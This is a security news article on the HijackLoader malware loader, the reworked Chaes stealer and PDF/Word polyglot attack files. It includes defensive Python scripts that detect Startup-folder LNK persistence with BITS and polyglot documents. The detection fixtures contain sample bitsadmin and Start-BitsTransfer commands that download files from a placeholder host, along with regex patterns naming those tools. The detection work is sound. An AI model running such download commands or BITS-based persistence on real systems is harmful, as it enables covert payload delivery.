The HijackLoader module loader is a new step in the evolution of cyber threats

Unique evasion techniques and malware features - this new threat should not be underestimated.

Security researchers at Zscaler ThreatLabZ have discovered a new malware downloader called HijackLoader, which was first spotted in July 2023 and allows delivery of DanaBot, SystemBC, and RedLine Stealer payloads.

Despite the lack of advanced features, the loader uses a modular architecture for code injection and execution, which is rare for most loaders.

HijackLoader uses several methods to evade security products, including direct system calls to avoid monitoring and deferred code execution at several stages for up to 40 seconds. Persistence on a compromised host is achieved by creating an LNK shortcut in the Windows Startup folder that relies on the Background Intelligent Transfer Service (BITS).
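The persistence artifact described above (an LNK shortcut dropped into the Startup folder, backed by BITS) is something a defender can look for in endpoint telemetry. The following detection logic is an added example written for this article, not code from Zscaler ThreatLabZ or from the loader itself. It assumes Sysmon-style events that have been reduced to a few simplified JSON fields (event ID 11 for file creation, 1 for process creation; field names `host`, `event_id`, `image`, `target`, `command_line` are this example's own convention), and the log lines it runs over are constructed for the example.

```python
"""Flag LNK files written to a Windows Startup folder and correlate them
with BITS job activity on the same host.  Added example; event format is
a simplified, assumed Sysmon-like JSON, and all log lines are constructed."""
import json
import re
from collections import defaultdict

# Constructed sample events.  WS01 shows both signals, WS02 a Startup LNK
# written by explorer.exe (could be legitimate), WS03 BITS activity only.
SAMPLE_LOG_LINES = [
    r'{"host":"WS01","event_id":11,"image":"C:\\Users\\bob\\AppData\\Local\\Temp\\setup.exe","target":"C:\\Users\\bob\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.lnk"}',
    r'{"host":"WS01","event_id":1,"image":"C:\\Windows\\System32\\bitsadmin.exe","command_line":"bitsadmin /transfer job1 /download /priority high http://example.invalid/stage C:\\Users\\bob\\AppData\\Local\\Temp\\stage.bin"}',
    r'{"host":"WS02","event_id":11,"image":"C:\\Windows\\explorer.exe","target":"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\OneDrive.lnk"}',
    r'{"host":"WS02","event_id":11,"image":"C:\\Windows\\explorer.exe","target":"C:\\Users\\alice\\Desktop\\report.docx"}',
    r'{"host":"WS03","event_id":1,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell -Command Start-BitsTransfer -Source http://example.invalid/a -Destination C:\\Temp\\a.bin"}',
]

# Per-user and all-users Startup folders share this tail; match any .lnk in them.
STARTUP_LNK_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$",
    re.IGNORECASE,
)
# BITS driven from the command line or from PowerShell.
BITS_RE = re.compile(r"\bbitsadmin(\.exe)?\b|Start-BitsTransfer", re.IGNORECASE)


def parse_events(lines):
    """Decode one JSON object per log line."""
    return [json.loads(line) for line in lines]


def find_startup_lnk(events):
    """File-creation events whose target is an .lnk inside a Startup folder."""
    return [e for e in events
            if e.get("event_id") == 11 and STARTUP_LNK_RE.search(e.get("target", ""))]


def find_bits_activity(events):
    """Process-creation events whose command line drives BITS."""
    return [e for e in events
            if e.get("event_id") == 1 and BITS_RE.search(e.get("command_line", ""))]


def correlate(events):
    """Group both signals by host and assign a severity.

    high   = Startup LNK and BITS activity on the same host
    medium = Startup LNK only (legitimate installers do this too, so triage)
    low    = BITS activity only
    """
    per_host = defaultdict(dict)
    for e in find_startup_lnk(events):
        per_host[e["host"]].setdefault("startup_lnk", []).append(e["target"])
    for e in find_bits_activity(events):
        per_host[e["host"]].setdefault("bits", []).append(e["command_line"])

    findings = {}
    for host, signals in per_host.items():
        if "startup_lnk" in signals and "bits" in signals:
            severity = "high"
        elif "startup_lnk" in signals:
            severity = "medium"
        else:
            severity = "low"
        findings[host] = {"severity": severity, **signals}
    return findings


def run_detection(lines=SAMPLE_LOG_LINES):
    """Convenience wrapper: parse, correlate, return findings keyed by host."""
    return correlate(parse_events(lines))


if __name__ == "__main__":
    for host, finding in run_detection().items():
        print(host, finding["severity"], finding)
```

The Startup-folder match alone is noisy (installers and OneDrive legitimately place shortcuts there), which is why the severity only rises when the LNK write is paired with BITS activity on the same host; in a real pipeline the `image` that wrote the LNK is the next field to triage.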

The exact HijackLoader infection vector is currently unknown. Beyond its anti-analysis features, the loader's main module provides flexible code injection and execution through its built-in modules.

The discovery of HijackLoader comes shortly after it was revealed that the Chaes malware, widely known for stealing financial information from e-commerce users in Latin America, has undergone major changes and is back in operation. Chaes was completely rewritten in Python, which reduces the likelihood of detection by traditional security systems, and its command-and-control communication protocol has also been redesigned.

Also recall that in July 2023, the Japanese Computer Security Emergency Team (JPCERT) discovered a new type of cyberattack that uses so-called "polyglot files". They combine the features of PDF and Word documents, which makes it easy to bypass security systems.
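A file that is a valid PDF and also carries a Word document is detectable precisely because it has to contain the markers of both formats. The checker below is an added example written for this article, not JPCERT's tooling or code from the attack; it looks for a PDF header at offset zero, for Word container markers anywhere in the file (OLE2 compound file, ZIP/OOXML, MHTML with Word XML namespaces) and for non-whitespace bytes appended after the final `%%EOF`. The sample byte strings are constructed for the example and are not real samples.

```python
"""Report when one byte string carries the markers of more than one
document format (the PDF/Word "polyglot" pattern).  Added example with
constructed inputs; no real sample is embedded."""
import re

PDF_MAGIC = b"%PDF-"

# Markers for the containers a Word document commonly ships in.
WORD_MARKERS = {
    "ole2_compound_file": re.compile(rb"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"),
    "zip_container": re.compile(rb"PK\x03\x04"),
    "mhtml_word": re.compile(
        rb"MIME-Version:.*?Content-Type:\s*multipart/related", re.DOTALL | re.IGNORECASE
    ),
    "word_xml": re.compile(
        rb"<w:WordDocument|urn:schemas-microsoft-com:office:word", re.IGNORECASE
    ),
}


def bytes_after_eof(data: bytes) -> int:
    """Count non-whitespace bytes after the last %%EOF (0 if none / no EOF).
    Incremental updates legitimately produce several %%EOF markers, so
    only content after the last one is treated as appended."""
    eof = data.rfind(b"%%EOF")
    if eof == -1:
        return 0
    return len(data[eof + len(b"%%EOF"):].strip())


def analyze(data: bytes) -> dict:
    """Return which format markers are present and a polyglot verdict."""
    is_pdf = data.startswith(PDF_MAGIC)
    found = sorted(name for name, rx in WORD_MARKERS.items() if rx.search(data))
    return {
        "pdf_header": is_pdf,
        "word_markers": found,
        "bytes_after_eof": bytes_after_eof(data),
        # A PDF header plus any Word marker is the signal to escalate.
        "polyglot": is_pdf and bool(found),
    }


# Constructed sample inputs (minimal, not real files).
CLEAN_PDF = (
    b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)
POLYGLOT_PDF_MHT = CLEAN_PDF + (
    b"MIME-Version: 1.0\n"
    b'Content-Type: multipart/related; boundary="----=_NextPart_000"\n\n'
    b"------=_NextPart_000\nContent-Type: text/html\n\n"
    b'<html xmlns:w="urn:schemas-microsoft-com:office:word">'
    b"<w:WordDocument></w:WordDocument></html>\n"
)
DOCX_LIKE = b"PK\x03\x04" + b"\x00" * 26 + b"[Content_Types].xml"


def demo():
    """Analyze the three constructed samples; returns results keyed by name."""
    return {
        "clean_pdf": analyze(CLEAN_PDF),
        "polyglot": analyze(POLYGLOT_PDF_MHT),
        "docx_like": analyze(DOCX_LIKE),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Treat the verdict as a triage signal rather than proof: a PDF portfolio with embedded attachments legitimately contains `PK\x03\x04`, so the `word_markers` list and the appended-bytes count are there to tell a reviewer which marker fired and whether the extra content sits after the PDF's own end-of-file, which is the layout the polyglot technique relies on.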